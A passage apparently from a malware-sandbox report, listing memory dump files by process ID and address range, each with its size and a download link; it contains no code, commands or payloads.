                  • memory/3884-43-0x0000000010B20000-0x0000000010B21000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/4040-87-0x00000000042B0000-0x0000000004761000-memory.dmp

                    Filesize

                    4.7MB

                    Download

                  • memory/4040-77-0x0000000072D90000-0x0000000072E23000-memory.dmp

                    Filesize

                    588KB

                    Download

                  • memory/4216-244-0x0000000004D20000-0x0000000004D21000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/4216-278-0x0000000009020000-0x0000000009021000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/4216-282-0x00000000091F0000-0x00000000091F1000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/4216-242-0x0000000004D20000-0x0000000004D21000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/4216-321-0x00000000098D0000-0x00000000098D1000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/4216-245-0x0000000070BD0000-0x00000000712BE000-memory.dmp

                    Filesize

                    6.9MB

                    Download

                  • memory/4216-288-0x0000000009810000-0x0000000009811000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/4216-246-0x0000000004CE0000-0x0000000004D03000-memory.dmp

                    Filesize

                    140KB

                    Download

                  • memory/4216-249-0x0000000007AA0000-0x0000000007AA1000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/4216-251-0x0000000008120000-0x0000000008121000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/4216-256-0x00000000081B0000-0x00000000081B1000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/4216-247-0x00000000075A0000-0x00000000075A1000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/4216-248-0x00000000051B0000-0x00000000051D2000-memory.dmp

                    Filesize

                    136KB

                    Download

                  • memory/4216-322-0x0000000009960000-0x0000000009961000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/4216-241-0x00000000032B8000-0x00000000032B9000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/4216-253-0x0000000008160000-0x0000000008161000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/4216-262-0x0000000008330000-0x0000000008331000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/4904-205-0x00000000008B0000-0x00000000008B1000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/4924-211-0x0000000004E60000-0x0000000004E61000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/4924-209-0x0000000003258000-0x0000000003259000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/4928-276-0x00000000008E0000-0x00000000008E1000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/4952-213-0x0000000004D50000-0x0000000004D51000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/4952-214-0x0000000004D50000-0x0000000004D51000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/4952-212-0x0000000003088000-0x0000000003089000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/4956-267-0x00000000008D0000-0x00000000008D1000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/4980-225-0x0000000004CE0000-0x0000000004CE1000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/4980-224-0x0000000003338000-0x0000000003339000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/5040-210-0x0000000010000000-0x00000000100E4000-memory.dmp

                    Filesize

                    912KB

                    Download

                  • memory/5052-263-0x0000000003298000-0x0000000003299000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/5052-264-0x0000000004E80000-0x0000000004E81000-memory.dmp

                    Filesize

                    4KB

                    Download